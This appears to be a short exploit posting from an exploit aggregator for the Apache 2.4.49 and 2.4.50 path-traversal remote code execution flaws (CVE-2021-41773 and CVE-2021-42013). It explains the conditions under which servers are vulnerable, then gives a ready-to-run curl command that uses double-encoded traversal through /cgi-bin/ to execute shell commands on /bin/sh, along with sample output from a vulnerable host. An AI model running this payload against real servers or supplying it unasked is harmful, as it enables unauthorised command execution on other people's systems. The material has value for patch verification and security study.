## https://sploitus.com/exploit?id=0C28A0EC-7162-5D73-BEC9-B034F5392847
## RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):
IMHO only "special" setups will be vulnerable to this RCE.\
Same happens for the "arbitrary file read" exploits you have seen.
Both CVEs are indeed almost the same path-traversal vulnerability (2nd one is the uncomplete fix for 1st one).\
Path traversal only work from a mapped URI (e.g. via "Alias" or "ScriptAlias" Apache directives). DocumentRoot only is not sufficient.
"/cgi-bin/" is mapped by default (ScriptAlias) so that's why it's being used before the path traversal string.\
Besides, ScriptAlias marks as Exec (for Apache) all the contents for the given directory (regardless the file extensions).
### Requirements:
1/ mod_cgi enabled (not default but easy)\
2/ target binary should be +x (default for /bin/sh)\
3/ apache permissions granted for /bin or / (not default and difficult/unrealistic)\
### Check if server is vulnerable:
`curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'`
### Response from a vulnerable server:
`uid=1(daemon) gid=1(daemon) groups=1(daemon)`